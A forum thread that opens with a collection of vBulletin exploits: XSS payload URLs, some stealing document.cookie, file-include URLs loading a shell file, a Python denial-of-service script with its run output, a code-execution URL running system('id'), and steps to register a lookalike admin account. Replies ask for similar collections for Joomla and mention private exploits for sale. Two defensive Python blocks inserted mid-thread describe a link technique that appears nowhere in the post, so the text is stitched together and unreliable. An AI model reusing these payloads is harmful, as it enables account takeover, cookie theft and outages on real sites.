    http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiP
    vBulletin Version 3.8.4 File Include Vulnerability

    Code:
    [http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
    http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
    Vbulletin 4.0.2 XSS Vulnerability

    Code:
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>
    vBulletin "Cyb - Advanced Forum Statistics" DOS

    Code:
    import urllib,urllib2,re
    print "####################################"
    print "#[+]ICW 0-day Domain Crasher #"
    print "#[+] Exploit found by Yash [ICW] #"
    print "#[+] Exploit Coded by FB1H2S [ICW] #"
    print "#[+] Care-Taker d4rk-blu [ICW] #"
    print "#[+] Indian Cyber Warriors #"
    print "####################################\n"
    print "Enter Domain Adress:"
    domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
    url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
    res = urllib.urlopen(url).read(200)
    phpmem= re.findall('of (.*?)bytes.*?',res)
    bytes=int(phpmem[0])
    mb=bytes/1048576
    print '[+]Server php memmory is:'+str(mb)+' MB'
    print "[+]Enter the No of request you wann send:"
    kill=raw_input("Some 20-30 will be enough:")
    try:
    for i in range(1,int(kill)):
    print i
    res1 = urllib.urlopen(url).read(200)
    print res1
    except(IOError),msg: print "Server will be FCUK'ed by now"
     
     
    ################################################################
    C:\Python25>python vbexploit.py
    ####################################
    #[+]ICW 0-day Domain Crasher #
    #[+] Bug found by Yash [ICW] #
    #[+] Exploit Coded by FB1H2S [ICW] #
    #[+] Care-Taker d4rk-blu [ICW] #
    #[+] Indian Cyber Warriors #
    ####################################
     
    Enter Domain Adress:
    [+]Ex: www.site.com<http://www.site.com>: sitehere
    [+]Server php memmory is:32 MB
    [+]Enter the No of request you wann send:20
    vBulletin v4.0.4 adserver Javascript (forumdisplay.php) Code Execution

    Code:
    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
    http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

    Code:
    1 > Go to Http://[localhost]/path/register.php
    2 > Assume that forum admin user name is ADMIN
    3 > Type this at User Name ===> ADMIN�
    4 > � is an ASCII Code
    5 > And complete the other parameters
    6 > Then click on Complete Registration
    7 > Now you see that your user name looks like the admin user name
    Original thread: mine, on ABH

    There you go ^^
    Last edited by xConsoLe, 06 September 2011, 15:52.
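
A defender-side check for the link technique described in the post above, as an added example (not part of the original post and not vBulletin code): it finds `data:text/html;base64,` links in submitted text, decodes them and reports the ones that carry script. The marker list, the function names and the sample input are assumptions made for this illustration.

```python
import base64
import binascii
import re

# data: URI with a base64 HTML body; the body may be wrapped across indented
# lines, as forum software does with long strings.
DATA_URI = re.compile(
    r"data:text/html;base64,([A-Za-z0-9+/]+(?:\r?\n[ \t]*[A-Za-z0-9+/]+)*={0,2})",
    re.IGNORECASE)
# Strings tied to the behaviour the post describes: scripted requests to the
# control panels that reuse the admin hash and security token.
MARKERS = ("xmlhttprequest", "admincp", "modcp", "adminhash", "securitytoken", "eval(")

def decode_body(b64_text):
    """Decode a wrapped or truncated base64 body; None if it cannot be decoded."""
    compact = re.sub(r"[^A-Za-z0-9+/]", "", b64_text)
    if len(compact) % 4 == 1:  # impossible length: drop the dangling character
        compact = compact[:-1]
    try:
        raw = base64.b64decode(compact + "=" * (-len(compact) % 4))
    except binascii.Error:
        return None
    return raw.decode("utf-8", errors="replace")

def scan_post(text):
    """Return a finding for each data: URI whose decoded HTML is scripted."""
    findings = []
    for match in DATA_URI.finditer(text):
        html = decode_body(match.group(1))
        lowered = (html or "").lower()
        hits = [m for m in MARKERS if m in lowered]
        if hits or "<script" in lowered:
            findings.append({"offset": match.start(), "markers": hits})
    return findings

def sample_uri(html, width=60):
    """Constructed test input: wrap a data: URI the way a forum post shows it."""
    b64 = base64.b64encode(html.encode()).decode()
    return "data:text/html;base64," + "\n    ".join(
        b64[i:i + width] for i in range(0, len(b64), width))

# Constructed, inert sample: it names the markers but performs no request chain.
SUSPECT = sample_uri("<script>/* inert sample */ var r = new XMLHttpRequest();"
                     " r.open('GET', '/admincp/index.php');"
                     " // looks for adminhash and securitytoken</script>")
print(scan_post("New skin preview, click here:\n" + SUSPECT + "\n\nThanks!"))
```

Run over posts, private messages and signatures at submission time, a non-empty result is a reason to strip the link or hold the message for review.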
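
One way to close the registration trick listed in the post above, as an added example (not vBulletin's own code): refuse user names that contain non-printing characters and compare a normalised form against the names already taken. The page does not preserve which character was appended, so the check covers the whole class; the function names and sample names are constructed.

```python
import unicodedata

# Unicode general categories that render as nothing or as blank space.
NON_PRINTING = {"Cc", "Cf", "Cn", "Co", "Cs", "Zs", "Zl", "Zp"}


def skeleton(name):
    """Comparison key: NFKC-normalised, non-printing characters dropped,
    runs of spaces collapsed, case-folded."""
    folded = unicodedata.normalize("NFKC", name)
    kept = "".join(ch for ch in folded
                   if ch == " " or unicodedata.category(ch) not in NON_PRINTING)
    return " ".join(kept.split()).casefold()


def check_username(candidate, existing):
    """Return (accepted, reason) for a requested user name."""
    hidden = [f"U+{ord(ch):04X}" for ch in candidate
              if ch != " " and unicodedata.category(ch) in NON_PRINTING]
    if hidden:
        return False, "non-printing character " + ", ".join(hidden)
    if candidate != " ".join(candidate.split()):
        return False, "leading, trailing or repeated spaces"
    taken = {skeleton(name): name for name in existing}
    clash = taken.get(skeleton(candidate))
    if clash is not None:
        return False, "collides with existing user " + clash
    return True, "ok"


# Constructed registration attempts against a forum whose admin is "ADMIN".
USERS = ["ADMIN", "alice"]
ATTEMPTS = ["ADMIN\u00a0", "ADMIN\u200b", "ADMIN\x00", "ADMIN ",
            "\uff21\uff24\uff2d\uff29\uff2e", "bob"]  # fifth entry is full-width
for attempt in ATTEMPTS:
    print(repr(attempt), check_username(attempt, USERS))
```

Lookalike letters from other scripts survive NFKC and need a confusables table such as the one in Unicode UTS #39 on top of this check.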

  • #2
    Right, I've moved it to Level IV: you'll easily understand why ^^

    And while I'm at it, a little +11, you're at 42

    Many thanks for this post.

    By any chance, would you have the same kind of script bank for other types of forums? For CMSs too (like Joomla ^^).

    Cyprium Download Link

    The more I study, the more I realise I know nothing.


    • #3
      For CMSs too (like Joomla ^^)
      I can see where you're going with this ^^
      mactux

      Knowledge is only real if it is shared


      • #4
        Do you often find sites built with vBulletin?
        I don't know vBulletin at all... it seems to be shareware for websites, right?! A bit like Drupal?

        PS: just so I don't die ignorant ^^
        Last edited by Yarflam, 04 December 2012, 04:04.
        ~ Yarflam ~

        ❉ The Universe is heading towards its ultimate perfection ❉


        • #5
          It's funny, nobody ever says "shareware". I've only seen that in the C2i/B2i tests and a few crappy sites.
          Anyway, it's what's called a CMS, I'll let you google that


          • #6
            The term shareware is pretty much forgotten, yes. It's used a lot on sites like 01net - legal download platforms... which half of people no longer use since the torrent era.

            Thanks for the information!
            Last edited by Yarflam, 07 December 2012, 22:37.
            ~ Yarflam ~

            ❉ The Universe is heading towards its ultimate perfection ❉


            • #7
              Note to audit enthusiasts: all the vBulletin 5 betas have an SQL injection.

              On the other hand, I don't really see the point of this kind of "collection", other than encouraging people to go and test the exploits without understanding them.


              • #8
                Oh shit! I didn't know! Got a link?!! We were just thinking of installing v5b, and we hadn't found any exploit in the DBs!

                Cyprium Download Link

                The more I study, the more I realise I know nothing.


                • #9
                  Originally posted by SAKAROV
                  Oh shit! I didn't know! Got a link?!! We were just thinking of installing v5b, and we hadn't found any exploit in the DBs!
                  The exploit isn't public; you can find it for sale pretty much everywhere, or directly by digging through the source code.


                  • #10
                    That's the problem with the Blacks (I mean the hackers, not black men): the best things are private. After that, good luck digging through the source code, but there are several forums for cracking the private ones, though they are hidden (well, they don't like having a lot of people, they prefer quality over quantity)